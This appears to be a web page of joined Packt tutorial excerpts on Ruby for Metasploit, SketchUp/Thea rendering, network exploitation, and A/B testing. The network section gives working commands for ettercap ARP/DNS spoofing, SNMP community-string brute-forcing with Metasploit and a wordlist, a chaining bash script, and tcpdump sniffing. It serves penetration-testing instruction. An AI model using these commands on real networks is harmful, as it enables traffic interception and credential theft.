(For more resources related to this topic, see here.) Reinventing Metasploit Consider a scenario where the systems under the scope of the penetration test are very large in number, and we need to perform a post-exploitation function such as downloading a particular file from all the systems after exploiting them. Downloading a particular file from each system manually will consume a lot of time and will be tiring as well. Therefore, in a scenario like this, we can create a custom post-exploitation script that will automatically download a file from all the systems that are compromised. This article focuses on building programming skill sets for Metasploit modules. It kicks off with the basics of Ruby programming and ends with developing various Metasploit modules. In this article, we will cover the following points: Understanding the basics of Ruby programming Writing programs in Ruby programming Exploring modules in Metasploit Writing your own modules and post-exploitation modules Let's now understand the basics of Ruby programming and gather the required essentials we need to code Metasploit modules. Before we delve deeper into coding Metasploit modules, we must know the core features of Ruby programming that are required in order to design these modules. However, why do we require Ruby for Metasploit? The following key points will help us understand the answer to this question: Constructing an automated class for reusable code is a feature of the Ruby language that matches the needs of Metasploit Ruby is an object-oriented programming language Ruby is an interpreter-based language that is fast and consumes less development time Perl, which earlier versions of Metasploit were written in, did not support code reuse as well Ruby – the heart of Metasploit Ruby is indeed the heart of the Metasploit framework. However, what exactly is Ruby? According to the official website, Ruby is a simple and powerful programming language. Yukihiro Matsumoto designed it in 1995. 
It is further defined as a dynamic, reflective, and general-purpose object-oriented programming language with functions similar to Perl. You can download Ruby for Windows/Linux from http://rubyinstaller.org/downloads/. You can refer to an excellent resource for learning Ruby practically at http://tryruby.org/levels/1/challenges/0. Creating your first Ruby program Ruby is an easy-to-learn programming language. Now, let's start with the basics of Ruby. However, remember that Ruby is a vast programming language. Covering all the capabilities of Ruby will push us beyond the scope of this article. Therefore, we will only stick to the essentials that are required in designing Metasploit modules. Interacting with the Ruby shell Ruby offers an interactive shell too. Working on the interactive shell will help us understand the basics of Ruby clearly. So, let's get started. Open your CMD/terminal and type irb in it to launch the Ruby interactive shell. Let's input something into the Ruby shell and see what happens; suppose I type in the number 2 as follows: irb(main):001:0> 2 => 2 The shell throws back the value. Now, let's give another input such as the addition operation as follows: irb(main):002:0> 2+3 => 5 We can see that if we input numbers using an expression style, the shell gives us back the result of the expression. Let's perform some functions on the string, such as storing the value of a string in a variable, as follows: irb(main):005:0> a= "nipun" => "nipun" irb(main):006:0> b= "loves metasploit" => "loves metasploit" After assigning values to the variables a and b, let's see what the shell response will be when we write a and a+b on the shell's console: irb(main):014:0> a => "nipun" irb(main):015:0> a+b => "nipunloves metasploit" We can see that when we typed in a as an input, it reflected the value stored in the variable named a. Similarly, a+b gave us back the concatenated result of variables a and b. 
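The same operations work outside the interactive shell too. Saved to a file and run with the ruby command, a minimal script (the filename is illustrative) behaves identically to the irb session above:

```ruby
# basics.rb -- the irb session above as a standalone script.
puts 2 + 3            # expression evaluation: 5

a = "nipun"
b = "loves metasploit"
puts a + b            # string concatenation: "nipunloves metasploit"
```

Run it with ruby basics.rb; each puts prints the value that irb echoed back interactively.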
Defining methods in the shell A method or function is a set of statements that will execute when we make a call to it. We can declare methods easily in Ruby's interactive shell, or we can declare them in a script as well. Methods are an important aspect of working with Metasploit modules. Let's see the syntax: def method_name [( [arg [= default]]...[, * arg [, &expr ]])] expr end To define a method, we use def followed by the method name, with arguments and expressions in parentheses. We also use an end statement following all the expressions to mark the end of the method definition. Here, arg refers to the arguments that a method receives. In addition, expr refers to the expressions that a method receives or calculates inline. Let's have a look at an example: irb(main):001:0> def week2day(week) irb(main):002:1> week=week*7 irb(main):003:1> puts(week) irb(main):004:1> end => nil We defined a method named week2day that receives an argument named week. Furthermore, we multiplied the received argument by 7 and printed out the result using the puts function. Let's call this function with an argument of 4: irb(main):005:0> week2day(4) 28 => nil We can see our function printing out the correct value by performing the multiplication operation. Ruby offers two different functions to print output: puts and print. However, when it comes to the Metasploit framework, the print_line function is used. Variables and data types in Ruby A variable is a placeholder for values that can change at any given time. In Ruby, we declare a variable only when we need to use it. Ruby supports numerous variable data types, but we will only discuss those that are relevant to Metasploit. Let's see what they are. Working with strings Strings are objects that represent a stream or sequence of characters. In Ruby, we can assign a string value to a variable with ease, as seen in the previous example. 
By simply defining the value in quotation marks or single quotation marks, we can assign a value to a string. It is recommended to use double quotation marks because single quotations can create problems. Let's have a look at the problem that may arise: irb(main):005:0> name = 'Msf Book' => "Msf Book" irb(main):006:0> name = 'Msf's Book' irb(main):007:0' ' We can see that when we used a single quotation mark, it worked. However, when we tried to put Msf's instead of the value Msf, an error occurred. This is because it read the single quotation mark in the Msf's string as the end of the single-quoted string, which is not the case; this situation caused a syntax-based error. The split function We can split the value of a string into a number of consecutive variables using the split function. Let's have a look at a quick example that demonstrates this: irb(main):011:0> name = "nipun jaswal" => "nipun jaswal" irb(main):012:0> name,surname=name.split(' ') => ["nipun", "jaswal"] irb(main):013:0> name => "nipun" irb(main):014:0> surname => "jaswal" Here, we have split the value of the entire string into two consecutive strings, name and surname, by using the split function. The function split the string into two by treating the space as the split position. The squeeze function The squeeze function collapses runs of repeated characters, which makes it handy for removing extra spaces from a string, as shown in the following code snippet: irb(main):016:0> name = "Nipun  Jaswal" => "Nipun  Jaswal" irb(main):017:0> name.squeeze => "Nipun Jaswal" Numbers and conversions in Ruby We can use numbers directly in arithmetic operations. However, remember to convert a string into an integer when working on user input using the .to_i function. Similarly, we can convert an integer into a string using the .to_s function. 
Let's have a look at some quick examples and their output: irb(main):006:0> b="55" => "55" irb(main):007:0> b+10 TypeError: no implicit conversion of Fixnum into String from (irb):7:in `+' from (irb):7 from C:/Ruby200/bin/irb:12:in `<main>' irb(main):008:0> b.to_i+10 => 65 irb(main):009:0> a=10 => 10 irb(main):010:0> b="hello" => "hello" irb(main):011:0> a+b TypeError: String can't be coerced into Fixnum from (irb):11:in `+' from (irb):11 from C:/Ruby200/bin/irb:12:in `<main>' irb(main):012:0> a.to_s+b => "10hello" We can see that when we assigned a value to b in quotation marks, it was considered as a string, and an error was generated while performing the addition operation. Nevertheless, as soon as we used the to_i function, it converted the value from a string into an integer variable, and addition was performed successfully. Similarly, with regards to strings, when we tried to concatenate an integer with a string, an error showed up. However, after the conversion, it worked. Ranges in Ruby Ranges are important aspects and are widely used in auxiliary modules such as scanners and fuzzers in Metasploit. Let's define a range and look at the various operations we can perform on this data type: irb(main):028:0> zero_to_nine= 0..9 => 0..9 irb(main):031:0> zero_to_nine.include?(4) => true irb(main):032:0> zero_to_nine.include?(11) => false irb(main):002:0> zero_to_nine.each{|zero_to_nine| print(zero_to_nine)} 0123456789=> 0..9 irb(main):003:0> zero_to_nine.min => 0 irb(main):004:0> zero_to_nine.max => 9 We can see that a range offers various operations such as searching, finding the minimum and maximum values, and displaying all the data in a range. Here, the include? function checks whether the value is contained in the range or not. In addition, the min and max functions display the lowest and highest values in a range. Arrays in Ruby We can simply define arrays as a list of various values. 
Let's have a look at an example: irb(main):005:0> name = ["nipun","james"] => ["nipun", "james"] irb(main):006:0> name[0] => "nipun" irb(main):007:0> name[1] => "james" So, up to this point, we have covered all the required variables and data types that we will need for writing Metasploit modules. For more information on variables and data types, refer to the following link: http://www.tutorialspoint.com/ruby/ Refer to a quick cheat sheet for using Ruby programming effectively at the following links: https://github.com/savini/cheatsheets/raw/master/ruby/RubyCheat.pdf http://hyperpolyglot.org/scripting Methods in Ruby A method is another name for a function. Programmers with a different background than Ruby might use these terms interchangeably. A method is a subroutine that performs a specific operation. The use of methods implements the reuse of code and decreases the length of programs significantly. Defining a method is easy, and their definition starts with the def keyword and ends with the end statement. Let's consider a simple program to understand their working, for example, printing out the square of 50: def print_data(par1) square = par1*par1 return square end answer=print_data(50) print(answer) The print_data method receives the parameter sent from the main function, multiplies it with itself, and sends it back using the return statement. The program saves this returned value in a variable named answer and prints the value. Decision-making operators Decision making is also a simple concept as with any other programming language. 
Let's have a look at an example: irb(main):001:0> 1 > 2 => false irb(main):002:0> 1 < 2 => true Let's also consider the case of string data: irb(main):005:0> "Nipun" == "nipun" => false irb(main):006:0> "Nipun" == "Nipun" => true Let's consider a simple program with decision-making operators: #Function def decision(par1) print(par1) if(par1%2==0) print("Number is Even") else print("Number is Odd") end end #Main num = gets num1 = num.to_i decision(num1) We define the method first so that it already exists when it is called. In the main section, we ask the user to enter a number and store it in a variable named num using gets. However, gets will save the user input in the form of a string. So, let's first change its data type to an integer using the to_i method and store it in a different variable named num1. Next, we pass this value as an argument to the method named decision and check whether the number is divisible by two. If the remainder is equal to zero, the number is divisible by two, which is why the if block is executed; if the condition is not met, the else block is executed. The output of the preceding program will be something similar to the following screenshot when executed in a Windows-based environment:
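For quick checks outside irb, the same even/odd logic can be written to return its result rather than print it. This is a sketch; parity is a hypothetical method name, not part of the program above:

```ruby
# Returning the message instead of printing it makes the logic easy to
# reuse and to test; parity is a hypothetical name for this illustration.
def parity(n)
  n % 2 == 0 ? "Number is Even" : "Number is Odd"
end

puts parity(10)  # Number is Even
puts parity(7)   # Number is Odd
```

Separating the decision from the printing is a small design choice that pays off as soon as you want to call the logic from other code, such as a Metasploit module.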
Packt
23 May 2014
6 min read

Setting Up for Photoreal Rendering

(For more resources related to this topic, see here.) Rendering process The following are the steps of the SketchUp and Thea rendering process. This process will work for other renderers, too, and is a good way of structuring your workflow, because you achieve great results in little time. For example, why find out a material hasn't mapped at the right scale only after an hour-long render? With the following process, you will find that out in a few minutes with a quick test render. Step 1: Preparing the SketchUp model Step 2: Performing an initial test render Step 3: Assigning materials Step 4: Defining lighting Step 5: Inserting extra entourage Step 6: Production rendering Step 7: Postproduction rendering We are going to look at each of these steps in detail using a small test room and an atrium scene. The test room is a variation of the famous Cornell Box, a well-established test setup to evaluate rendering algorithms. You can also use any scene that you have set up yourself in SketchUp. Thea for SketchUp interface The main interface for working with Thea in SketchUp is the Thea for SketchUp plugin. The plugin gives you access to all features that are necessary to set up and render a scene out of SketchUp. This is beneficial for a quick workflow, because you don't have to switch between SketchUp and the Thea Studio application during the setup of your scene. The Thea plugin is accessible by navigating to Plugins | Thea Render. It is split into two main windows: the Thea Tool window and the Thea Rendering Window. There is also a toolbar with two buttons to enable each of these windows. The Thea Tool window We will use the buttons and controls of the tool window to set up the camera options and add materials and other elements that will be specially treated during the export (such as lights). 
The window is structured in four panels (or tabs) that you can see in the following image: When the Thea Tool is active, you will also see a red frame displayed in the SketchUp 3D window that shows the field of view for the current Thea camera. This either frames the area that will be rendered or indicates that the camera view is wider than the SketchUp window via arrows to the left and right. You will also notice that the SketchUp cursor changes when you have the Thea Tool window open. Depending on the current tool in use, there are a number of different cursor shapes. The default is a small cross and is used to select SketchUp materials for the material assignment. The Thea Rendering Window The main window is the place where you can set up, control, and view the rendering process itself. The window has a large area at the top where the rendered image is displayed. Below is a row of buttons to save and refresh rendered images and to start, pause, and stop the current render. You can see a screenshot of the rendering window with an open scene in the following image: At the bottom of the window, you will find the control elements for the rendering and display of images and the advanced scene options. Step 1 – Preparing the SketchUp model To follow the steps in this article, you can download the Cornell Box SketchUp file from Packt Support. In this demo scene, the model is already prepared for 3D rendering, and there are scenes set up to follow the steps below. If you imported our test box from the 3D Warehouse (search for Cornell Box) or used your own SketchUp model, you should do some preparations before you can start rendering: Create a copy of your SketchUp file just for rendering. You will create new scenes and content dedicated to the rendering process, and you can save all this in a dedicated SketchUp file. Remove unused content. Check the model for hidden geometry, unused and obsolete scene tabs and layers, and especially materials. Purge the material list. 
Identify the important materials in the scene, especially those that are used for windows and nearby large objects. Double-check the orientation of surfaces that you want to convert to emitting surfaces or to which you want to apply a displacement map. Create and save important camera viewpoints in scene tabs. Step 2 – Performing an initial test render You are now going to do a test render to see what the model looks like when rendered in another renderer. You can use this first test to identify areas that need more modeling or parts where you should add textures to make them more interesting. In SketchUp, select the view you want to render. If you use the Cornell scene from the Packt Publishing website, select the Step 2 scene. If you imported the Cornell box from the 3D Warehouse, select one side of the box and hide it so that you can see the objects inside. Open the Thea Tool window by navigating to Plugins | Thea Render | Thea Tool. Check that the resolution on the camera tab is set to 800 x 600 pixels, and the aspect ratio is set to 4:3. These are the defaults. Open the Thea render window by navigating to Plugins | Thea Render | Thea Rendering Window. In the settings area of the Thea window, select Adaptive (BSD) as the render mode. Then, check that the Preset selection is set to 00. Exterior Preview. Click on the Start button. Your scene will render, and you should see the progress in the image area of the window. The rendering should complete in less than a minute (depending on your computer performance, of course). The final image will look something like the following image: Review the rendered image, and pay attention to the following aspects: Check that all the textures are in place correctly. Make a note of where the textures are missing or distorted. (Note that there are no textures in our scene yet.) Look out for the quality of the geometry details, especially on rounded corners and smooth surfaces such as the teapot and sphere in our scene. 
Search for areas in the image that look unnaturally "empty". You should consider adding further geometry or a surface texture to make these areas more visually interesting. Also, look at the distribution of the objects in your scene. Remember that this is a 2D representation of your room that should look well balanced without the knowledge of the 3D model behind it. If you have found any issues with your scene, you should now go back into SketchUp and make some corrections. This is the export-check loop, which you may have to repeat a few times. The more you get used to SketchUp and your rendering application, the less you will need to do this. However, for now, there is a lot to learn by performing this exercise, so the time is well spent. Summary In this article, we got a glimpse of the ways in which we can use tools such as Thea for performing photorealistic rendering on our scenes. Resources for Article: Further resources on this subject: Walkthrough Tools within SketchUp 7.1 [Article] Diving Straight into Photographic Rendering [Article] Case study – modifying a GoPro wrench [Article]
Packt
22 May 2014
8 min read

Network Exploitation and Monitoring

(For more resources related to this topic, see here.) Man-in-the-middle attacks Using ARP abuse, we can actually perform more elaborate man-in-the-middle (MITM)-style attacks, building on the ability to abuse address resolution and host identification schemes. This section will focus on the methods you can use to do just that. MITM attacks are aimed at fooling two entities on a given network into communicating by the proxy of an unauthorized third party, or allowing a third party to access information in transit between two entities on a network. For instance, when a victim connects to a service on the local network or on a remote network, a man-in-the-middle attack will give you as an attacker the ability to eavesdrop on or even augment the communication happening between the victim and its service. By service, we could mean a web (HTTP), FTP, or RDP service, or really anything that doesn't have the inherent means to defend itself against MITM attacks, which turns out to be quite a lot of the services we use today! Ettercap DNS spoofing Ettercap is a tool that provides both a simple command-line and a graphical interface for performing MITM attacks using a variety of techniques. In this section, we will be focusing on applications of ARP spoofing attacks, namely DNS spoofing. You can set up a DNS spoofing attack with ettercap by performing the following steps: Before we get ettercap up and running, we need to modify the file that holds the DNS records for our soon-to-be-spoofed DNS server. This file is found under /usr/share/ettercap/etter.dns. What you need to do is either add DNS names and IP addresses or modify the ones currently in the file by replacing all the IPs with yours, if you'd like to act as the intercepting host. Now that our DNS server records are set up, we can invoke ettercap. 
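For reference, entries in etter.dns follow a simple zone-file-like record format. The entries below are hypothetical, with a placeholder domain and an illustrative attacker address standing in for yours:

```
# /usr/share/ettercap/etter.dns -- example records (hypothetical values)
example.com      A   192.168.10.99
*.example.com    A   192.168.10.99
www.example.com  PTR 192.168.10.99
```

Any victim whose DNS requests pass through ettercap will then resolve the listed names to the address you supplied.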
Invoking ettercap is pretty straightforward; here's the usage specification: ettercap [OPTIONS] [TARGET1] [TARGET2] To perform a MITM attack using ettercap, you need to supply the -M switch and pass it an argument indicating the MITM method you'd like to use. In addition, you will also need to specify that you'd like to use the DNS spoofing plugin. Here's what the invocation will look like: ettercap -M arp:remote -P dns_spoof [TARGET1] [TARGET2] where TARGET1 is the host you want to intercept and TARGET2 is either the default gateway or the DNS server, interchangeably. To target the host at address 192.168.10.107 with a default gateway of 192.168.10.1, you will invoke the following command: ettercap -M arp:remote -P dns_spoof /192.168.10.107//192.168.10.1/ Once launched, ettercap will begin poisoning the ARP tables of the specified hosts and listening for any DNS requests to the domains it's configured to resolve. Interrogating servers For any network device to participate in communication, certain information needs to be accessible to it; no device will be able to look up a domain name or find an IP address without the participation of devices in charge of that information. In this section, we will detail some techniques you can use to interrogate common network components for sensitive information about your target network and the hosts on it. SNMP interrogation The Simple Network Management Protocol (SNMP) is used by routers and other network components in order to support remote monitoring of things such as bandwidth, CPU/memory usage, hard disk space usage, logged-on users, running processes, and a number of other incredibly sensitive collections of information. Naturally, any penetration tester who finds an exposed SNMP service on their target network will need to know how to extract any potentially useful information from it. About SNMP Security SNMP services before Version 3 are not designed with security in mind. 
Authentication to these services often comes in the form of a simple string of characters called a community string. Another common implementation flaw inherent to SNMP Versions 1 and 2 is the ability to brute-force and eavesdrop on communication. To enumerate SNMP servers for information using the Kali Linux tools, you could resort to a number of techniques. The most obvious one would be snmpwalk, and you can use it with the following command: snmpwalk -v [1 | 2c | 3] -c [community string] [target host] For example, let's say we were targeting 192.168.10.103 with a community string of public, which is a common community string setting; you will then invoke the following command to get information from the SNMP service: snmpwalk -v 1 -c public 192.168.10.103 Here, we opted to use SNMP Version 1, hence the -v 1 in the invocation of the preceding command. The output will look something like the following screenshot: As you can see, this actually extracts some pretty detailed information about the targeted host. Whether this is a critical vulnerability or not will depend on which kind of information is exposed. On Microsoft Windows machines and some popular router operating systems, SNMP services could expose user credentials and even allow remote attackers to augment them maliciously, should they have write access to the SNMP database. Exploiting SNMP successfully often depends strongly on the device implementing the service. You could imagine that for routers, your target will probably be the routing table or the user accounts on the device. For other host types, the attack surface may be quite different. Try to assess the risk of SNMP-based flaws and information leaks with respect to the host and possibly the wider network it's hosted on. Don't forget that SNMP is all about sharing information, information that other hosts on your network probably trust. 
Think about the kind of information accessible and what you will be able to do with it should you have the ability to influence it. If you can attack the host, attack the hosts that trust it.

Another collection of tools that is really great at collecting information from SNMP services is the snmp_enum, snmp_login, and similar modules available in the Metasploit Framework. The snmp_enum module does pretty much exactly what snmpwalk does, except it structures the extracted information in a friendlier format, which makes it easier to understand. Here's an example:

msfcli auxiliary/scanner/snmp/snmp_enum [OPTIONS] [MODE]

The options available for this module are shown in the following screenshot:

Here's an example invocation against the host in our running example:

msfcli auxiliary/scanner/snmp/snmp_enum RHOSTS=192.168.10.103

The preceding command produces the following output:

You will notice that we didn't specify the community string in the invocation. This is because the module assumes a default of public. You can specify a different one using the COMMUNITY parameter.

In other situations, you may not always be lucky enough to preemptively know the community string being used. However, luckily, SNMP Versions 1, 2, and 2c do not inherently have any protection against brute-force attacks, nor do they use any form of network-based encryption. In the case of SNMP Versions 1 and 2c, you could use a nifty Metasploit module called snmp_login that will run through a list of possible community strings and determine the level of access the enumerated strings grant you. You can use it by running the following command:

msfcli auxiliary/scanner/snmp/snmp_login RHOSTS=192.168.10.103

The preceding command produces the following output:

As seen in the preceding screenshot, once the run is complete, it will list the enumerated strings along with the level of access granted.
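A toy sketch of what snmp_login does under the hood: try each candidate community string and record the access level granted. The probe function and its accepted strings here are stand-ins for real SNMP requests over UDP/161 (a real tool would use an SNMP library), so treat everything below as illustrative:

```python
# Simulated community-string brute force. ACCEPTED stands in for the target
# agent's real configuration; probe() stands in for a real SNMP GET request.

ACCEPTED = {"public": "read-only", "s3cret": "read-write"}  # pretend agent config

def probe(host, community):
    """Return the access level for a community string, or None if rejected."""
    return ACCEPTED.get(community)

def brute_force(host, wordlist):
    found = {}
    for community in wordlist:
        access = probe(host, community)
        if access:
            found[community] = access
    return found

hits = brute_force("192.168.10.103", ["admin", "public", "private", "s3cret"])
print(hits)  # {'public': 'read-only', 's3cret': 'read-write'}
```

The structure mirrors snmp_login's behavior: iterate a wordlist, keep only the strings the agent accepts, and note whether each grants read-only or read-write access.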
The snmp_login module uses a static list of possible strings to do its enumeration by default, but you could also run this module on some of the password lists that ship with Kali Linux, as follows:

msfcli auxiliary/scanner/snmp/snmp_login PASS_FILE=/usr/share/wordlists/rockyou.txt RHOSTS=192.168.10.103

This will use the rockyou.txt wordlist to look for strings to guess with. Because all of these Metasploit modules are command line-driven, you can of course combine them. For instance, if you'd like to brute-force a host for the SNMP community strings and then run the enumeration module on the strings it finds, you can do this by crafting a bash script as shown in the following example:

#!/bin/bash
if [ $# != 1 ]
then
  echo "USAGE: . snmp.sh [HOST]"
  exit 1
fi
TARGET=$1
echo "[*] Running SNMP enumeration on '$TARGET'"
for comm_string in `msfcli auxiliary/scanner/snmp/snmp_login RHOSTS=$TARGET E 2> /dev/null | awk -F"'" '/access with community/ { print $2 }'`
do
  echo "[*] found community string '$comm_string' ...running enumeration"
  msfcli auxiliary/scanner/snmp/snmp_enum RHOSTS=$TARGET COMMUNITY=$comm_string E 2> /dev/null
done

The following command shows you how to use it:

. snmp.sh [HOST]

In our running example, it is used as follows:

. snmp.sh 192.168.10.103

Other than guessing or brute-forcing SNMP community strings, you could also use tcpdump to filter out any packets that could contain unencrypted SNMP authentication information. Here's a useful example:

tcpdump udp port 161 -i eth0 -vvv -A

The preceding command will produce the following output:

Without going too much into detail about the SNMP packet structure, looking through the printable strings captured, it's usually pretty easy to spot the community string. You may also want to look at building a more comprehensive packet-capturing tool using something such as Scapy, which is available in Kali Linux.
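The awk extraction in the script above can also be sketched in Python. The sample output line format below is a hypothetical stand-in for what snmp_login prints on a successful login; the exact wording varies between Metasploit versions, so the regex is an assumption to adjust against real output:

```python
import re

# Pull community strings out of snmp_login-style output. The line format
# here is assumed for illustration, not copied from a real Metasploit run.

def extract_communities(output):
    pattern = re.compile(r"access with community '([^']+)'")
    return [m.group(1) for line in output.splitlines()
            for m in pattern.finditer(line)]

sample = """\
[+] 192.168.10.103 provides READ-ONLY access with community 'public'
[+] 192.168.10.103 provides READ-WRITE access with community 's3cret'
[-] 192.168.10.103 login failed with community 'admin'"""

print(extract_communities(sample))  # ['public', 's3cret']
```

Like the awk one-liner, this keys on the "access with community" marker and captures the quoted string, ignoring failed attempts.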
Packt
22 May 2014
13 min read

A/B Testing – Statistical Experiments for the Web

(For more resources related to this topic, see here.)

Defining A/B testing

At its most fundamental level, A/B testing just involves creating two different versions of a web page. Sometimes, the changes are major redesigns of the site or the user experience, but usually, the changes are as simple as changing the text on a button. Then, for a short period of time, new visitors are randomly shown one of the two versions of the page. The site tracks their behavior, and the experiment determines whether one version or the other increases the users' interaction with the site. This may mean more click-through, more purchases, or any other measurable behavior. This is similar to other methods in other domains that use different names. The basic framework randomly tests two or more groups simultaneously and is sometimes called randomized controlled experiments or online controlled experiments. It's also sometimes referred to as split testing, as the participants are split into two groups. These are all examples of between-subjects experiment design. Experiments that use these designs all split the participants into two groups. One group, the control group, gets the original environment. The other group, the test group, gets the modified environment that those conducting the experiment are interested in testing. Experiments of this sort can be single-blind or double-blind. In single-blind experiments, the subjects don't know which group they belong to. In double-blind experiments, those conducting the experiments also don't know which group the subjects they're interacting with belong to. This safeguards the experiments against biases that can be introduced by participants being aware of which group they belong to. For example, participants could get more engaged if they believe they're in the test group because this is newer in some way. Or, an experimenter could treat a subject differently in a subtle way because of the group that they belong to.
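As a side note, the random split described above is often implemented deterministically by hashing a stable visitor identifier, so the same visitor always sees the same variant across requests. A minimal sketch, in which the hash choice and the 50/50 split are illustrative assumptions rather than anything prescribed by this article:

```python
import hashlib

# Deterministic A/B assignment: hash a stable visitor ID (e.g. a cookie
# value or tracking number) and use the parity of the digest to pick a
# group. The same ID always maps to the same group, with no per-user
# coin flip to store.

def assign_group(visitor_id):
    digest = hashlib.md5(visitor_id.encode("utf-8")).hexdigest()
    return "test" if int(digest, 16) % 2 else "control"

for vid in ("visitor-1", "visitor-2", "visitor-1"):
    print(vid, assign_group(vid))  # repeated IDs land in the same group
```

Because assignment depends only on the ID, no coordination is needed between servers, and the split stays stable even if the user's session state is lost.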
As the computer is the one that directly conducts the experiment, and because those visiting your website aren't aware of which group they belong to, website A/B testing is generally an example of a double-blind experiment. Of course, this is an argument for only conducting the test on new visitors. Otherwise, the user might recognize that the design has changed and throw the experiment off. For example, the users may be more likely to click on a new button when they recognize that the button is, in fact, new. However, if they are new to the site as a whole, then the button itself may not stand out enough to warrant extra attention. In some cases, these experiments can test more than two variants of the site. This divides the test subjects into more groups, so there need to be more subjects available in order to compensate. Otherwise, the experiment's statistical validity might be in jeopardy. If each group doesn't have enough subjects, and therefore observations, then there is a larger error rate for the test, and results will need to be more extreme to be significant. In general, though, you'll want to have as many subjects as you reasonably can. Of course, this is always a trade-off. Getting 500 or 1000 subjects may take a while, given the typical traffic of many websites, but you still need to take action within a reasonable amount of time and put the results of the experiment into effect. So we'll talk later about how to determine the number of subjects that you actually need to get a certain level of significance. Another wrinkle is that you'll want to know as soon as possible whether one option is clearly better, so that you can begin to profit from it early. This is known as the multi-armed bandit problem, and it embodies the tension in experiment design (and other domains) between exploring the problem space and exploiting the resources you've found in the experiment so far.
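Although this article doesn't implement a bandit, a toy epsilon-greedy strategy makes the exploration-versus-exploitation trade-off concrete. The true click-through rates, the epsilon value, and the optimistic handling of unseen arms below are all made-up illustrative choices:

```python
import random

# Toy epsilon-greedy bandit: mostly show the variant with the best observed
# click-through rate (exploit), but show a random variant 10% of the time
# (explore). Arms never shown yet get an infinite estimate so each is
# tried at least once.

def epsilon_greedy(true_rates, pulls=1000, epsilon=0.1, seed=1):
    rng = random.Random(seed)
    shown = [0] * len(true_rates)
    clicks = [0] * len(true_rates)
    for _ in range(pulls):
        if rng.random() < epsilon:
            arm = rng.randrange(len(true_rates))                      # explore
        else:
            arm = max(range(len(true_rates)),
                      key=lambda i: clicks[i] / shown[i] if shown[i]
                      else float("inf"))                              # exploit
        shown[arm] += 1
        if rng.random() < true_rates[arm]:
            clicks[arm] += 1
    return shown, clicks

shown, clicks = epsilon_greedy([0.24, 0.29])
print(shown, clicks)  # the better arm tends to accumulate most of the traffic
```

Unlike a fixed-size A/B test, this adaptively shifts traffic toward the winner while the experiment is still running, at the cost of the clean fixed-sample statistics discussed next.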
We won't get into this further, but it is a factor to stay aware of as you perform A/B tests in the future. Because of the power and simplicity of A/B testing, it's being widely used in a variety of domains. For example, marketing and advertising make extensive use of it. Also, it has become a powerful way to test and improve measurable interactions between your website and those who visit it online. The primary requirement is that the interaction be somewhat limited and very measurable. Interesting would not make a good metric; the click-through rate or pages visited, however, would. Because of this, A/B tests validate changes in the placement or in the text of buttons that call for action from the users. For example, a test might compare the performance of Click for more! against Learn more now!. Another test may check whether a button placed in the upper-right section increases sales versus one in the center of the page. These changes are all incremental, and you probably don't want to break a large site redesign into pieces and test all of them individually. In a larger redesign, several changes may work together and reinforce each other. Testing them incrementally and only applying the ones that increase some metric can result in a design that's not aesthetically pleasing, is difficult to maintain, and costs you users in the long run. In these cases, A/B testing is not recommended. Some other things that are regularly tested in A/B tests include the following parts of a web page: The wording, size, and placement of a call-to-action button The headline and product description The length, layout, and fields in a form The overall layout and style of the website as a larger test, which is not broken down The pricing and promotional offers of products The images on the landing page The amount of text on a page Now that we have an understanding of what A/B testing is and what it can do for us, let's see what it will take to set up and perform an A/B test. 
Conducting an A/B test

In creating an A/B test, we need to decide several things, and then we need to put our plan into action. We'll walk through those decisions here and create a simple set of web pages that will test the aspects of design that we are interested in changing, based upon the behavior of the user. Before we start building stuff, though, we need to think through our experiment and what we'll need to build.

Planning the experiment

For this article, we're going to pretend that we have a website for selling widgets (or rather, looking at the website Widgets!). The web page in this screenshot is the control page. Currently, we're getting 24 percent click-through on it from the Learn more! button. We're interested in the text of the button. If it read Order now! instead of Learn more!, it might generate more click-through. (Of course, actually explaining what the product is and what problems it solves might be more effective, but one can't have everything.) This will be the test page, and we're hoping that we can increase the click-through rate to 29 percent (a five percent absolute increase). Now that we have two versions of the page to experiment with, we can frame the experiment statistically and figure out how many subjects we'll need for each version of the page in order to achieve a statistically meaningful increase in the click-through rate on that button.

Framing the statistics

First, we need to frame our experiment in terms of the null-hypothesis test. In this case, the null hypothesis would look something like this: Changing the button copy from Learn more! to Order now! would not improve the click-through rate. Remember, this is the statement that we're hoping to disprove (or fail to disprove) in the course of this experiment. Now we need to think about the sample size. This needs to be fixed in advance.
To find the sample size, we'll use the standard error formula, solved for the number of observations needed for about a 95 percent confidence interval, to get us in the ballpark of how large our sample should be:

n = 16σ² / δ²

In this, δ is the minimum effect to detect and σ² is the sample variance. If we are testing for something like a percent increase in the click-through, the variance is σ² = p(1 – p), where p is the initial click-through rate with the control page. So for this experiment, the variance will be 0.24(1 – 0.24), or 0.1824. This would make the sample size for each variant 16 × (0.1824 / 0.05²), or almost 1170. The code to compute this in Clojure is fairly simple:

(defn get-target-sample [rate min-effect]
  (let [v (* rate (- 1.0 rate))]
    (* 16.0 (/ v (* min-effect min-effect)))))

Running the code from the prompt gives us the response that we expect:

user=> (get-target-sample 0.24 0.05)
1167.36

Part of the reason to calculate the number of participants needed is that monitoring the progress of the experiment and stopping it prematurely can invalidate the results of the test, because it increases the risk of false positives where the experiment says it has disproved the null hypothesis when it really hasn't. This seems counterintuitive, doesn't it? Once we have significant results, we should be able to stop the test. Let's work through it. Let's say that in actuality, there's no difference between the control page and the test page. That is, both sets of copy for the button get approximately the same click-through rate. If we're attempting to get p ≤ 0.05, then it means that the test will return a false positive five percent of the time. It will incorrectly say that there is a significant difference between the click-through rates of the two buttons five percent of the time. Let's say that we're running the test and planning to get 3,000 subjects. We end up checking the results after every 1,000 participants.
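For readers following along in another language, here is a direct port of the Clojure function above to Python; it reproduces the same 1167.36 figure:

```python
# n = 16 * sigma^2 / delta^2 per variant, with sigma^2 = p * (1 - p).
# A direct port of the Clojure get-target-sample function.

def get_target_sample(rate, min_effect):
    variance = rate * (1.0 - rate)
    return 16.0 * variance / (min_effect * min_effect)

print(round(get_target_sample(0.24, 0.05), 2))  # 1167.36
```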
Let's break down what might happen:

Run      A    B    C    D    E    F    G    H
1000     No   No   No   No   Yes  Yes  Yes  Yes
2000     No   No   Yes  Yes  No   Yes  No   Yes
3000     No   Yes  No   Yes  No   No   Yes  Yes
Final    No   Yes  No   Yes  No   No   Yes  Yes
Stopped  No   Yes  Yes  Yes  Yes  Yes  Yes  Yes

